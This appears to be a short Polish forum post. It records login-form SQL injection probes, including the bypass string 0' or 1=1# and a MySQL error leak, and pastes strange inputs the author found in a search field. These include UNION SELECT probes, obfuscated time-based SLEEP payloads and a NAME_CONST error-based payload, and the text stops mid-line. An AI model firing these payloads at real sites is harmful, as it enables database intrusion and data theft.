1.[POST] po wpisaniu do loginu: 0' or 1=1# zwraca prawde status 200 i login.php ale bez kontentu.
2.[POST] w loginie: ' zwraca Warning: mysqlnumrows(): supplied argument is not a valid MySQL result resource in home/mojuser/bla/bla/login.php on line 23
3.[POST] Input: search
Ludzie nieustannie wpisują jakieś dziwne rzeczy do Raportera, to chyba ma być #sqlinjection #sql tylko, że ja nie używam sql ( ͡° ͜ʖ ͡°)
1111111111111" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45) -- /* order by "as /*
' AnD sLeep(3) ANd '1
'&&SLeeP('0 3')&&'1
'&&' '=0x20&&sLEEp(3)&&'1
'And'1'&&SLEep(3)&&'1
'&&'/**/'=0x2F2A2A2F&&SleeP(3)&&'1
' AnD SLeeP(3) #
' And sLEEp(3)
or (1,2)=(select*from(select nameconst(CHAR(110,105,121,76,112,105,103,73,88),1),nameconst(CHAR(110,105,121,76,112,105,103,73,88),1))a) -- and 1=1
' or